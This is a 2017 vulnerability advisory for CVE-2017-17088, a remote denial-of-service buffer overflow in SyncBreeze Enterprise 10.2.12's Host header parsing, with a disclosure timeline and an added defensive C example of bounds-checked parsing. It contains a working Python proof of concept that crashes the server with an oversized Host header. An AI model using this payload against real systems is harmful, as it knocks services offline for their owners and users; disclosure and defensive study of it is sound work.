Sync Breeze 10.2.12 - Denial of Service
Source: vfocus.net  Author: Cardenas  Published: 2017-12-18
=============================================
MGC ALERT 2017-007
- Original release date: November 30, 2017
- Last revised:  December 14, 2017
- Discovered by: Manuel García Cárdenas
- Severity: 7,5/10 (CVSS Base Score)
- CVE-ID: CVE-2017-17088
=============================================
 
I. VULNERABILITY
-------------------------
SyncBreeze <= 10.2.12 - Denial of Service
 
II. BACKGROUND
-------------------------
SyncBreeze is a fast, powerful and reliable file synchronization solution
for local disks, network shares, NAS storage devices and enterprise storage
systems.
 
III. DESCRIPTION
-------------------------
The Enterprise version of SyncBreeze is affected by a Remote Denial of
Service vulnerability.
 
The web server does not check bounds when reading the Host header of a
request on connection, resulting in a classic buffer overflow that causes a
denial of service.
 
Exploiting the vulnerability only requires using version 1.1 of the HTTP
protocol to interact with the application.
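 
Added example (not part of the original advisory and not SyncBreeze code): a bounds-checked Host header extractor in C, showing the length check that the description says is missing. The function name, return codes and the 255-byte limit are assumptions chosen for illustration.

```c
#include <stdio.h>
#include <string.h>
#include <strings.h>

/* Assumed policy: DNS names top out at 253 bytes; 255 leaves room for ":port". */
#define HOST_MAX 255

enum host_rc { HOST_OK = 0, HOST_MISSING = -1, HOST_TOO_LONG = -2, HOST_MALFORMED = -3 };

/* Hypothetical helper (not SyncBreeze code): copy the Host value of a raw
 * request into out[out_cap], checking the length before any byte is copied. */
enum host_rc extract_host(const char *req, size_t len, char *out, size_t out_cap)
{
    const char *p = req, *end = req + len;

    while (p < end) {
        const char *eol = memchr(p, '\n', (size_t)(end - p));
        if (!eol) return HOST_MALFORMED;            /* unterminated header line */
        size_t n = (size_t)(eol - p);
        if (n && p[n - 1] == '\r') n--;             /* accept CRLF or bare LF */
        if (n == 0) return HOST_MISSING;            /* blank line ends the headers */

        if (n >= 5 && strncasecmp(p, "Host:", 5) == 0) {
            const char *v = p + 5;
            size_t vlen = n - 5;
            while (vlen && (*v == ' ' || *v == '\t')) { v++; vlen--; }
            while (vlen && (v[vlen - 1] == ' ' || v[vlen - 1] == '\t')) vlen--;
            /* Reject instead of truncating: the caller should answer 400. */
            if (vlen > HOST_MAX || vlen >= out_cap) return HOST_TOO_LONG;
            memcpy(out, v, vlen);
            out[vlen] = '\0';
            return HOST_OK;
        }
        p = eol + 1;
    }
    return HOST_MISSING;
}

int main(void)
{
    /* Constructed inputs: a normal request and one with a 2000-byte Host value. */
    const char ok[] = "GET / HTTP/1.1\r\nHost: files.example.test:80\r\n\r\n";
    char big[2100], out[HOST_MAX + 1];
    int n = snprintf(big, sizeof big, "GET / HTTP/1.1\r\nHost: %0*d\r\n\r\n", 2000, 0);

    printf("normal:    rc=%d\n", extract_host(ok, sizeof ok - 1, out, sizeof out));
    printf("oversized: rc=%d\n", extract_host(big, (size_t)n, out, sizeof out));
    return 0;
}
```

An oversized value is rejected outright rather than truncated, so a bad Host header never reaches routing or logging code in shortened form.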
 
IV. PROOF OF CONCEPT
-------------------------
#!/usr/bin/python
import sys, socket
 
host = sys.argv[1]
buffer="GET / HTTP/1.1\r\n"
buffer+="Host: "+"A"*2000+"\r\n\r\n"
 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, 80))
s.send(buffer)
s.close()
 
V. BUSINESS IMPACT
-------------------------
Availability compromise can result from these attacks.
 
VI. SYSTEMS AFFECTED
-------------------------
SyncBreeze <= 10.2.12
 
VII. SOLUTION
-------------------------
The vendor released version 10.3:
http://www.syncbreeze.com/setups/syncbreezeent_setup_v10.3.14.exe
 
VIII. REFERENCES
-------------------------
http://www.syncbreeze.com/
 
IX. CREDITS
-------------------------
This vulnerability has been discovered and reported
by Manuel García Cárdenas (advidsec (at) gmail (dot) com).
 
X. REVISION HISTORY
-------------------------
November 30, 2017 1: Initial release
December 14, 2017 2: Revision to send to lists
 
XI. DISCLOSURE TIMELINE
-------------------------
November 30, 2017 1: Vulnerability acquired by Manuel Garcia Cardenas
November 30, 2017 2: Sent to vendor
December 6,  2017 3: Vendor fixes the vulnerability and releases a new version
December 14, 2017 4: Sent to the Full-Disclosure lists
 
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
 
XIII. ABOUT
-------------------------
Manuel Garcia Cardenas
Pentester
 